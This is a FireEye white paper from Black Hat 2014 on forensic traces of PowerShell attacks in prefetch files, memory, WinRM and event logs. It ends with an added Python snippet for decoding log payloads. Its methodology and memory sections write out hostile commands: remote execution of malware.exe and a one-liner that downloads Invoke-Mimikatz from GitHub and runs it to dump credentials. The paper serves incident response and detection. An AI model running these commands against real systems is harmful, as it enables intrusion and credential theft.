Investigating PowerShell Attacks
Black Hat USA 2014
www.fireeye.com

Contents

Introduction and Prior Research
Assumptions
Testing Methodology
Findings and Sources of Evidence
    Registry
    Prefetch
    Network Traffic
    Event Logs
    Persistent PowerShell
Acknowledgements
Appendix: PowerShell Version Table

Introduction and Prior Research

Microsoft Windows PowerShell has finally hit the mainstream for system administrators, defenders, and attackers. Though nearly ten years old as of 2014, PowerShell has only recently become ubiquitous across both user endpoints and servers in most enterprise environments. Microsoft Windows 7 SP1 and Windows Server 2008 R2 were the first versions of the operating system to include PowerShell (version 2.0) installed by default. Since then, updated versions of PowerShell have been included in every subsequent release of Windows, through PowerShell 4.0 on Windows Server 2012 R2 and on Windows 8.1 [1].

As is often the case, the increased availability of PowerShell has paralleled the development of research on ways attackers can take advantage of it. David Kennedy and Josh Kelley were among the first to present on this topic at Black Hat 2010 [2], demonstrating code execution, password dumping, and creation of reverse shells via PowerShell. Chris Gates and Rob Fuller cited WinRM as a means of remote command execution during penetration tests at DerbyCon 2012 [3] and in subsequent blog posts; this technique quickly gained traction among other offensive security practitioners.

Beginning in late 2011, researchers began to craft even more sophisticated PowerShell attack methodologies and toolkits. In November 2011, Matt Graeber released PowerSyringe [4], a code injection utility and precursor to the rewritten PowerSploit Framework [5], first released in May 2012. Throughout 2013, Joseph Bialek began publishing a variety of in-memory attacks leveraging reflective DLL loading through PowerShell [6], including the ability to remotely execute the Mimikatz [7] credential harvesting tool without ever writing malicious binaries to disk. At ShmooCon 2013, Chris Campbell presented and released code for a PowerShell botnet [8] with complete command and control capabilities; his blog [9] is frequently updated with additional PowerShell attack techniques.

Throughout 2013 and 2014, Graeber, Bialek, Campbell and other contributors developed PowerSploit [10] from proof-of-concept code to a robust framework of scripts for the post-exploitation phase of an attack, facilitating code execution, persistence, reconnaissance, anti-virus bypass, and more. Other PowerShell attack toolkits, such as Nikhil Mittal's Nishang [11], also emerged during this period. Finally, some of the most popular penetration testing tools, including TrustedSec Social Engineering Toolkit [12] and Rapid7 Metasploit [13], now include PowerShell payloads.

During the course of their incident response work at Mandiant, the authors also have observed adversaries increasingly use PowerShell during targeted intrusions. Many attackers, just like system administrators and security professionals, are only beginning to learn how to most effectively leverage PowerShell during the post-compromise phase of an incident. As a result, the authors often witness extremely basic usage of PowerShell, such as simply replacing the use of remote command execution tools such as PsExec with PowerShell's Invoke-Command or Enter-PSSession to achieve their objectives and evade detection. However, even these simplistic techniques introduce another means by which attackers can leverage built-in components of the operating system, instead of external tools or malware, and thereby evade detection.

The widespread availability of PowerShell in an average corporate Windows environment, the maturation of PowerShell attack toolkits, and the steady increase in PowerShell know-how among intruders has created a perfect storm for those seeking to protect a network or investigate a compromise. This motivated the authors to focus their efforts on the forensic footprints left behind by the various ways that an attacker might use PowerShell, a topic for which publicized research is scarce as of this writing.

The goals of this research were to identify the sources of evidence on disk, in logs, and in memory resulting from malicious usage of PowerShell, particularly when used to target a remote host. Understanding these artifacts can help reconstruct an attacker's activity during forensic analysis of a compromised system. In addition, they can help analysts recognize the sources of evidence that are suitable for proactive monitoring, both on a single system and at scale, to detect PowerShell attacks.

[1] A PowerShell version table is provided in the Appendix to this white paper.
[2] Kennedy, David, and Josh Kelley. "PowerShell: It's Time To Own." Black Hat. Black Hat, Jul. 2010. 29 Jun. 2014.
[3] Gates, Chris, and Rob Fuller. "Dirty Little Secrets They Didn't Teach You In Pentest Class v2." SlideShare. N.p., 10 Oct. 2012. 29 Jun. 2014.
[4] Graeber, Matthew. "PowerShell-based Code/Dll Injection Utility." Exploit Monday. N.p., 21 Nov. 2011. 29 Jun. 2014.
[5] Graeber, Matthew. "PowerSploit: A PowerShell Post-Exploitation Framework." Exploit Monday. N.p., 26 May 2012. 29 Jun. 2014.
[6] Bialek, Joseph. "Reflective DLL Injection with PowerShell." clymb3r. N.p., 6 Apr. 2013. 29 Jun. 2014.
[7] Bialek, Joseph. "Modifying Mimikatz to be Loaded Using Invoke-ReflectiveDLLInjection.ps1." clymb3r. N.p., 9 Apr. 2013. 29 Jun. 2014.
[8] Campbell, Chris. "No Tools? No Problem! Building a PowerShell Bot." YouTube. N.p., 16 Feb. 2013. 29 Jun. 2014.
[9] http://obscuresecurity.blogspot.com
[10] https://github.com/mattifestation/PowerSploit
[11] https://github.com/samratashok/nishang
[12] http://tipstrickshack.blogspot.com/2014/01/deliver-powershell-payload-using-macro.html
[13] http://www.metasploit.com

Assumptions

Although this white paper focuses on forensic analysis, it is worthwhile to briefly discuss the Windows security controls intended to limit malicious usage of PowerShell, and the authors' assumptions regarding an attacker's level of access.

This research began with the premise that an attacker would rely upon PowerShell during the post-compromise phase of an incident. In the authors' experience, intruders typically gain local administrator privileges on one or several Windows systems immediately or shortly after their initial entry vector into an environment. Due to poorly secured Active Directory environments, and the widespread know-how on how to move laterally and escalate privileges, these first footholds frequently lead to compromise of elevated domain account privileges or Domain Administrator altogether.

The authors therefore based their research on the following assumptions:

- The attacker can obtain administrator-equivalent rights on the target system, most typically the credentials for a privileged domain account.
- The attacker can laterally access the target system over common Windows ports and protocols, e.g. SMB, NetBIOS, and/or WinRM.
- The attacker can remotely enable PowerShell remoting and the WinRM service on a remote host by means of other native Windows commands, such as through a scheduled task ("at" command), the service control manager ("sc" command), or Windows Management Instrumentation (WMI).
- The attacker can bypass the default "Restricted" policy under which PowerShell will execute scripts [14].
- The attacker, given administrator privileges, could bypass or disable a constrained remoting endpoint configured to limit the scope of PowerShell commands available to a user. A lower-privileged attacker might also bypass such controls; Joseph Bialek and Lee Holmes have also recently blogged on techniques to break out of constrained runspace, if implemented with vulnerable code, and run unauthorized commands [15].

Finally, the authors chose to focus their research on sources of evidence that were specific to usage of PowerShell. Analysis of the forensic artifacts common to any user interaction with a Windows system, such as logon events generated during authentication, artifacts of interactive usage of Explorer, etc., are well covered by prior research and beyond the scope of this study.

[14] http://technet.microsoft.com/en-us/library/hh849812.aspx
[15] Bialek, Joseph. "Cracking Open PowerShell's Constrained Runspace." clymb3r. N.p., 25 Jun. 2014. 29 Jun. 2014.

Testing Methodology

The authors conducted the majority of testing using a client (e.g. attacker) and remote (e.g. victim) system running Windows 7 SP1. All test sequences were performed using PowerShell 2.0, the most common pre-installed version in the wild. The authors performed additional testing with PowerShell 3.0 on both the client and server. This white paper denotes any instances where available evidence may differ between versions of PowerShell.

The authors executed the following sequence of commands during testing. These commands were chosen as representative examples of how an attacker might interact with a targeted system through PowerShell. They also make use of basic cmdlets that are likely to be used even in more complex attacks.

- Single remote cmdlet execution through Invoke-Command, such as:
      Invoke-Command 192.168.17.150 {Get-ChildItem c:\scripts}
- Single remote binary execution through Invoke-Command, such as:
      Invoke-Command 192.168.17.150 {c:\malware.exe}
- Remote in-memory download and execution of PowerSploit framework script Invoke-Mimikatz.ps1, such as:
      Invoke-Command 192.168.17.150 {iex((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')); Invoke-Mimikatz -DumpCreds}
- Remote interactive PowerShell command session, initiated with the syntax:
      Enter-PSSession 192.168.17.150

The authors also utilized evidence gathered during their work conducting incident response and forensic analysis for Mandiant. Wherever possible, test scenarios were constructed to replicate these findings in a controlled environment to ensure their accuracy.

Findings and Sources of Evidence

The following sections summarize each of the sources of evidence that may provide evidence of malicious PowerShell usage on a compromised system. These sources include the registry, prefetch files, memory, event logs, and network traffic. In addition, the authors provide an analysis of forensic artifacts that may result when an attacker configures a PowerShell script to persist on a system.

Registry

The authors did not identify any registry keys or values that recorded the execution of PowerShell commands or remoting activity. However, an attacker may tamper with PowerShell configuration settings that are resident in the registry to facilitate their activity.

One such example is the PowerShell execution policy, which controls the profiles and scripts that a user is permitted to load and execute on a system. The registry stores this setting in the value ExecutionPolicy within key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell. By default, the policy is set to Restricted on all versions of Windows except Windows Server 2012 R2, on which it is set to RemoteSigned [16]. The execution policy can be configured through Group Policy; as a result, this setting should be consistent across most or all systems in a typical Active Directory environment.

An attacker may change the setting to Bypass before attempting to execute malicious PowerShell script. This would result in an update to the Last Modified timestamp of the registry key. Based on the authors' observations, this key does not frequently change during normal system operations. Of course, an attacker could avoid modifying this setting and simply include the command line option -ExecutionPolicy Bypass each time they invoked PowerShell. However, the authors have investigated at least one case where the attacker consistently modified the execution policy when interacting with targeted systems during lateral movement.

[16] "about_Execution_Policies." Microsoft TechNet. N.p., 8 May 2014. 30 Jun. 2014.

Prefetch

Windows Prefetch is a performance enhancement feature, first introduced in Windows XP, designed to shorten load times during boot and application startup. The operating system stores prefetch files, denoted with extension .PF, in the directory %systemroot%\prefetch. Forensic investigators often use the prefetch as a source of evidence of executable files that previously ran on a system. Parsing the contents of these files [17] can yield:

- Date and time of first execution (corresponding to the prefetch file creation date)
- Last run time (stored within the prefetch file)
- Number of times executed (stored within the prefetch file)
- List of files accessed during the first ten seconds of execution (stored within the prefetch file)
- Full path to executable file (derived from accessed file list)

During testing and in real-world incident investigations, the authors observed that the prefetch file for powershell.exe can contain references to recently executed PowerShell scripts. In order to be present within the prefetch file's accessed file list, a given script must be loaded within the first ten seconds of powershell.exe execution. This reliably occurs when running powershell.exe at a command line with a script argument, but not when using an interactive PowerShell session.

As an example, the authors executed a test script from the command shell using the syntax:

      powershell.exe -File C:\temp\persistence.ps1

This resulted in an update to the Last Run time and an increment to the run count stored within the corresponding prefetch file, POWERSHELL.EXE-59FC8F3D.pf. The accessed file list contained a reference to the script, as shown below.

[Figure 1: Portion of accessed file list within prefetch file for PowerShell.exe]

The accessed file list does retain entries from previous instances of a given program executing, so even if powershell.exe runs again subsequent to attacker activity, its prefetch file may still retain the accessed file information for a previously loaded script.

As part of an investigative process, the authors recommend the following basic steps:

- Examine the PowerShell prefetch file creation timestamp and last run timestamp to determine if they correlate with other periods of suspected attacker activity.
- Parse or string search the accessed file list and examine the names and paths of any referenced PS1 files.

The authors have also conducted this analysis at scale across large Windows environments. Given the forensic tools to do so, one could collect and search all PowerShell prefetch files across all systems; each file is only several hundred kilobytes. If an analyst has already identified attacker staging directories or file naming conventions from previous investigative findings, this information could be used for initial searches against the accessed file lists. It also may be possible to conduct frequency analysis of script names and paths referenced across all of the gathered prefetch files in order to identify uncommon or suspicious entries.

[17] Numerous free tools and scripts can parse prefetch files. Several used by the authors include NirSoft WinPrefetchView (http://www.nirsoft.net/utils/win_prefetch_view.html), TZWorks Prefetch Parser (https://tzworks.net/prototype_page.php?proto_id=1), and Mandiant Redline (https://www.mandiant.com/resources/download/redline). The Accessed File list is also plainly visible in Unicode strings within a prefetch file.

Network Traffic

The authors did not extensively analyze network-based evidence resulting from PowerShell remoting activity. As of PowerShell version 2.0, all remoting traffic occurs over ports 5985 (HTTP) and 5986 (HTTPS) by default. In both cases, the request payloads are encrypted; use of HTTPS only adds header encryption, since all content is sent over SSL. Clear-text HTTP headers may only provide the username conducting the remoting (in the case of NTLMSSP authentication, present in the Authorization header) and the version of the PowerShell client in use.

Investigators may have more success conducting network flow analysis to identify anomalous usage of PowerShell remoting. If remoting is legitimately used for system administration activities in an environment, it should originate from a predictable set of source systems. Organizations with the capability to monitor flows across internal-to-internal, DMZ-to-internal, or VPN-to-internal network segments should attempt to baseline traffic over ports 5985 and 5986. This may help identify unauthorized usage of remoting by an attacker.

Memory

The authors focused their memory analysis research on the forensic impact of PowerShell remote code execution through the WinRM service. Although local execution of PowerShell scripts and code certainly yields its own set of memory-resident artifacts, other sources of evidence documented in this white paper can provide better coverage of these scenarios. The authors were most interested in determining how memory analysis could address the worst-case scenario of an attacker using PowerShell remoting, in combination with in-memory attacks like reflective DLL injection, to compromise a remote system without ever touching its disk.

To conduct this research, the authors took memory snapshots of a victim system before, during, and after the execution of the commands listed in the methodology section of this white paper. Analysis of the memory images was conducted using Volatility Framework and Mandiant Redline.

The first step of analysis was to identify the processes on a targeted system whose memory space might contain remnants of PowerShell remoting activity. Upon receiving a remote command, the instance of the service host process (svchost.exe) running the DCOM Server Process Launcher service (short name DCOMLaunch) spawns an instance of c:\windows\system32\wsmprovhost.exe. This binary is the host process for WinRM plugins. What occurs next depends on the type of PowerShell command executed through remoting:

- If the command invokes a native cmdlet, it executes directly within the context of wsmprovhost.exe; it does not spawn a separate child instance of powershell.exe. Once the cmdlet completes, wsmprovhost.exe terminates.
- If the command executes a separate binary, such as an executable file already on the victim's disk, the binary is loaded as a child process of wsmprovhost.exe. Once the binary exits, wsmprovhost.exe terminates.
- If the command initiates an interactive PowerShell session, e.g. through Enter-PSSession, it runs directly within the context of wsmprovhost.exe. This process continues to execute until the PSSession terminates.

In all three cases, the authors observed that PowerShell objects and Remoting Protocol XML remained readily visible in the process memory space of wsmprovhost.exe [18].

In the example depicted below, the authors executed the command echo helloworld > c:\test.txt during an interactive remote PSSession, executed the dir command to confirm the presence of the output file, then captured memory from the target system before ending the session. Note that the objects visible in process memory contained both the submitted commands as well as the output.

[Figure 2: Remnants of echo command during PSSession retained in wsmprovhost.exe]
[Figure 3: Remnants of dir output in wsmprovhost.exe]

However, in practice, wsmprovhost.exe is not a useful source of evidence because it terminates immediately upon the conclusion of a remoting session. In most investigative scenarios, an analyst would not be able to identify a potentially compromised system and capture memory from this process before it had exited.

Another instance of svchost.exe, that which loads the WinRM service, is a more promising target for post-compromise analysis. Depending on the host configuration, Windows may automatically start the WinRM service upon boot, or an attacker may remotely start it when enabling remoting. The memory space of the WinRM service can contain portions of Web Services Management (WSMAN) SOAP messages exchanged during remoting. A subset of these messages may include clear-text commands and cmdlets, executed one at a time or during interactive sessions. Most importantly, and in contrast to wsmprovhost.exe, the service continues to run after the completion of a PowerShell session.

The figure below provides a fragment of SOAP containing the command echo teststring_pssession > c:\testoutput_pssession.txt. The evidence was recovered from WinRM svchost.exe memory on an accessed system after a remote interactive PSSession had completed and wsmprovhost.exe had terminated.

[Figure 4: Remnants of PowerShell remoting commands in WinRM svchost.exe]

In another test scenario, the authors used a variation of a technique [19] that downloads and executes the Invoke-Mimikatz PowerSploit script on a remote host. The PowerShell command executed on the client (attack) system was as follows:

      Invoke-Command -Computername 192.168.114.133 {iex((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')); Invoke-Mimikatz -DumpCreds}

This command downloads Invoke-Mimikatz.ps1, stores it in memory, and executes it with the option -DumpCreds. In turn, Invoke-Mimikatz.ps1 uses reflective DLL injection to load Mimikatz in memory and harvest credentials. The result is remote execution of Mimikatz without ever touching disk: an ideal challenge for memory forensics.

The authors acquired memory from the victim system twice: once immediately following the completion of the remote Invoke-Mimikatz PowerShell, and once after five hours had transpired. In both cases, the WinRM svchost.exe contained a nearly complete copy of the attack system's command line. Figure 5 depicts a memory dump at the offset where this string was located, as produced by Volatility.

[Figure 5: Remnants of remote Invoke-Mimikatz attack in WinRM svchost.exe]

There are several important caveats to this approach. First, analysts should expect to deal with a significant amount of noise and irrelevant data when searching memory for remnants of commands. PowerShell objects and SOAP carry enormous overhead; a single cmdlet and response may result in dozens of messages. The authors encountered the same challenges when examining PowerShell analytic logs, as noted in the Event Logs portion of this white paper. A manual review process, without knowing exactly what to search for, may be tedious.

Testing identified several strings present within the PowerShell Remoting Protocol, or the WSMan protocol used in WinRM, that are effective starting points for searches:

- wsman.xsd
- <rsp:Command>
- <rsp:CommandLine>
- <rsp:Arguments>

Analysts should review the contents of memory offsets adjacent to each search hit for additional context and remnants of command activity.

How long is such evidence retained in WinRM service memory? Test results suggested that the most significant variable was the volume of WinRM activity that occurs following the commands of interest. Virtual machines configured with only 512MB of RAM, fully utilized, still contained recoverable remnants of commands within the WinRM svchost.exe process memory space after one week had elapsed. However, the authors also found that the number of recoverable commands was difficult to predict, and any subsequent WinRM activity quickly eradicated remnants of older sessions.

Memory and disk snapshots acquired during testing also contained remnants of PowerShell remoting commands in kernel pool and in the pagefile. The authors found that the presence of this evidence was largely the result of paging activity that can be difficult to predict or control. Kernel memory and the pagefile should be included in the scope of string searches for PowerShell command artifacts, but may yield a low rate of returns.

As is always the case with memory forensics, time is of the essence. The authors' research concluded that it is possible to reconstruct at least fragments of PowerShell remoting activity in memory, even at the completion of a session. These techniques may be practical when conducting analysis of a single system of interest; however, they do not readily lend themselves to at-scale, proactive monitoring of systems in an enterprise environment.

[18] Microsoft documents the PowerShell Remoting Protocol at http://msdn.microsoft.com/en-us/library/dd357801.aspx
[19] Gates, Chris. "Dumping a domain's worth of passwords with mimikatz." Carnal0wnage Blog. N.p., 4 Oct. 2013. 30 Jun. 2014.

Event Logs

Windows event logs are instrumental when examining a potentially compromised system for evidence of attacker activity. Earlier versions of Windows PowerShell (version 2.0 and prior) provide few useful audit settings, thereby limiting the availability of evidence (such as a command history) useful for forensic analysts. PowerShell 3.0 and later has largely addressed this shortcoming with the introduction of a more robust module logging feature. However, in the authors' experience, Windows 7 and Server 2008 remain the most prevalent operating systems in most corporate environments. Without being explicitly upgraded to PowerShell 3.0, these systems will unfortunately not have access to its enhanced auditing capabilities.

Nevertheless, even the default level of logging in older versions can provide sufficient evidence to identify signs of PowerShell usage, distinguish remoting from local activity, and provide context such as the duration of sessions and associated user account. This may help an analyst correlate other forensic evidence on a single system of interest with PowerShell activity. At enterprise scale, these events may be used to establish a baseline of normal PowerShell usage and thereby identify anomalies.

Upon executing any PowerShell command or script, regardless if locally or through remoting, Windows may write events to the following three logs:

- Windows PowerShell.evtx
- Microsoft-Windows-PowerShell%4Operational.evtx [20]
- Microsoft-Windows-PowerShell%4Analytic.etl

Since PowerShell implements its remoting functionality through the Windows Remote Management (WinRM) service, the following two event logs also capture remote PowerShell activity:

- Microsoft-Windows-WinRM%4Operational.evtx
- Microsoft-Windows-WinRM%4Analytic.etl

[20] The Operational and Analytic logs actually contain a forward slash in their name, e.g. Microsoft-Windows-PowerShell/Operational.evtx. The corresponding log filenames on disk use the encoded character %4 in place of the slash.

Logging in PowerShell 2.0

In general, PowerShell 2.0 event logs can provide the start/stop times of command activity or script execution, the loaded providers (indicative of the types of functionality in use), and the user account under which the activity occurred. They do not provide a detailed history of all executed commands or their output.

The analytic logs, disabled by default, pose the opposite problem. If enabled, they capture an enormous volume of data: essentially every PowerShell operation or SOAP remoting message exchanged during activity. However, the quantity of these events, and the need to assemble and decode log messages, can hinder practical analysis.

The following sections summarize the important evidence captured by each event log pertaining to PowerShell 2.0 activity.

Windows PowerShell.evtx

Each time that PowerShell executes, either upon the execution of a single command, the start of a local session, or the start of a remoting session, this log records an Event ID (EID) 400 message: "Engine state is changed from None to Available". At the completion of the session, the log records an EID 403 event: "Engine state is changed from Available to Stopped".

The message details for both EID 400 and EID 403 events include a HostName field. If executed locally, this field will be logged as HostName=ConsoleHost. If PowerShell remoting is in use, the accessed system will record these events with HostName=ServerRemoteHost.

Neither message records the user account associated with the PowerShell activity. However, by using these events, an analyst may determine the duration of a PowerShell session and whether it ran locally or through remoting.

Microsoft-Windows-PowerShell%4Operational.evtx

The authors did not identify any forensically significant events written to the PowerShell Operational event log when using PowerShell 2.0.

Microsoft-Windows-WinRM%4Operational.evtx

The WinRM Operational log records all use of the Windows Remote Management service, including that which is conducted through PowerShell remoting. The authors found the following event IDs provide useful forensic evidence:

- EID 6: Recorded at the onset of remoting activity on the client system. Includes the destination address to which the system connected. Example: "Creating WSMan Session. The connection string is: 192.168.114.140/wsman?PSVersion=2.0"
- EID 169: Recorded at the onset of remoting activity on an accessed system. Includes the username and authentication mechanism used to access WinRM. Example: "User win-alicePC\alice authenticated successfully using NTLM authentication"
- EID 81, 82, 134: Generated by the under-the-hood operations that occur during PowerShell remoting on an accessed system. Rather than recording the specific commands submitted at the command line, these entries are rather vague and low-level. The User name field in these messages does record the domain and username of the account conducting the remoting activity. Aside from that, these events are mainly useful for defining the timeframe during which remoting occurred.

The following examples illustrate the types of event messages captured in the WinRM Operational event log during the execution of a PowerShell remoting command:

- EID 82: Entering the plugin for operation CreateShell with a ResourceURI of http://schemas.microsoft.com/powershell/Microsoft.PowerShell
- EID 81: Processing client request for operation CreateShell
- EID 134: Sending response for operation CreateShell
- EID 81: Processing client request for operation DeleteShell

Microsoft also provides the ability to disable Windows Remote Shell, the component of WinRM that supports the PowerShell cmdlets Invoke-Command and Enter-PsSession. This setting can be configured through Group Policy, under Computer Configuration > Administrative Templates > Windows Components > Windows Remote Shell > Allow Remote Shell Access. If set to Disabled on the remote system, the source system attempting to initiate a Remote Shell connection will record the following EID 142 event in the WinRM Operational log: "WSMan operation CreateShell failed, error code 2150859180".

Microsoft-Windows-PowerShell%4Analytic.etl

PowerShell analytic logging must be explicitly enabled to capture events and is intended for troubleshooting rather than a long-term auditing solution. When active, the log records all remotely executed PowerShell commands and the corresponding responses under the following event IDs:

- EID 32850: Records the user account that authenticated for remoting. Example: "Request 7873936. Creating a server remote session. UserName: CORPDOMAIN\JohnD"
- EID 32867/32868: Records each PowerShell input and output object that is exchanged during PowerShell remoting, including protocol and version negotiation as well as command I/O. The objects are stored as XML-encoded hexadecimal strings in a field denoted "Payload data", and due to length are often fragmented across multiple log messages.

While this log can contain forensically significant evidence of PowerShell remoting activity, the volume of events and level of effort required to decode them limits their practical use during investigations.

The figure below displays an example of an EID 32867 event generated on a remotely accessed system upon the execution of a simple PowerShell command: Invoke-Command {Get-ChildItem C:\}

[Figure 6: Encoded PowerShell remoting command in PowerShell analytic]

Decoding this message results in the XML depicted below. Note that the command Get-ChildItem and argument C:\ are visible in plain text.

[Figure 7: Excerpt of decoded XML containing PowerShell command and argument]

The subsequent EID 32868 events, containing the command output, once decoded appear as follows.
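
The hex-to-XML decoding step described for EID 32867 and 32868, as an added example that is not part of the white paper: it reorders and joins fragmented payloads, decodes them, and pulls out the command and argument strings. The record keys (object_id, fragment_id, payload_hex), the UTF-8 encoding and the element names matched are assumptions about how an analyst has exported the events, and the sample data is constructed.

```python
import html
import re
from collections import defaultdict

# Constructed sample: a simplified remoting object for the paper's
# Get-ChildItem example, hex-encoded and split across two log records.
SAMPLE_XML = (
    r'<Obj RefId="0"><MS><Obj N="PowerShell" RefId="1"><MS>'
    r'<Obj N="Cmds" RefId="2"><LST><Obj RefId="3"><MS>'
    r'<S N="Cmd">Get-ChildItem</S>'
    r'<Obj N="Args" RefId="4"><LST><Obj RefId="5"><MS>'
    r'<Nil N="N" /><S N="V">C:\</S>'
    r'</MS></Obj></LST></Obj></MS></Obj></LST></Obj></MS></Obj></MS></Obj>'
)
SAMPLE_RAW = b"\xef\xbb\xbf" + SAMPLE_XML.encode("utf-8")  # BOM + XML bytes
CUT = len(SAMPLE_RAW) // 2
SAMPLE_EVENTS = [  # hypothetical export schema, deliberately out of order
    {"event_id": 32867, "object_id": 5, "fragment_id": 1,
     "payload_hex": SAMPLE_RAW[CUT:].hex()},
    {"event_id": 32867, "object_id": 5, "fragment_id": 0,
     "payload_hex": "0x" + SAMPLE_RAW[:CUT].hex()},
]

# Element names assumed from the constructed sample above.
CMD_RE = re.compile(r'<S N="Cmd">(.*?)</S>', re.S)
ARG_RE = re.compile(r'<S N="V">(.*?)</S>', re.S)


def hex_to_bytes(payload_hex):
    """Convert one 'Payload data' value to bytes, tolerating 0x and whitespace."""
    s = re.sub(r"\s+", "", payload_hex)
    if s[:2].lower() == "0x":
        s = s[2:]
    if len(s) % 2:  # odd length: drop a truncated trailing nibble
        s = s[:-1]
    return bytes.fromhex(s)


def reassemble(events):
    """Group records by object, order by fragment number, join and decode.

    Joining happens at the byte level so a multi-byte character split
    across two fragments still decodes correctly.
    """
    groups = defaultdict(list)
    for ev in events:
        groups[ev["object_id"]].append(ev)

    result = {}
    for object_id, frags in groups.items():
        frags.sort(key=lambda e: e["fragment_id"])
        ids = [f["fragment_id"] for f in frags]
        raw = b"".join(hex_to_bytes(f["payload_hex"]) for f in frags)
        text = raw.decode("utf-8", errors="replace")
        start = text.find("<")  # skip a BOM or any leading non-XML bytes
        result[object_id] = {
            # True only when fragments 0..n-1 are all present, no gaps
            "contiguous": ids == list(range(len(ids))),
            "xml": text[start:] if start >= 0 else "",
        }
    return result


def extract_commands(xml_text):
    """Regex extraction, so a partially recovered object still yields strings."""
    return {
        "commands": [html.unescape(m) for m in CMD_RE.findall(xml_text)],
        "arguments": [html.unescape(m) for m in ARG_RE.findall(xml_text)],
    }


if __name__ == "__main__":
    for oid, obj in reassemble(SAMPLE_EVENTS).items():
        print(oid, obj["contiguous"], extract_commands(obj["xml"]))
```

Objects flagged as not contiguous are worth keeping: a lone trailing fragment can still contain an argument or output string even when the command element itself was in a missing record.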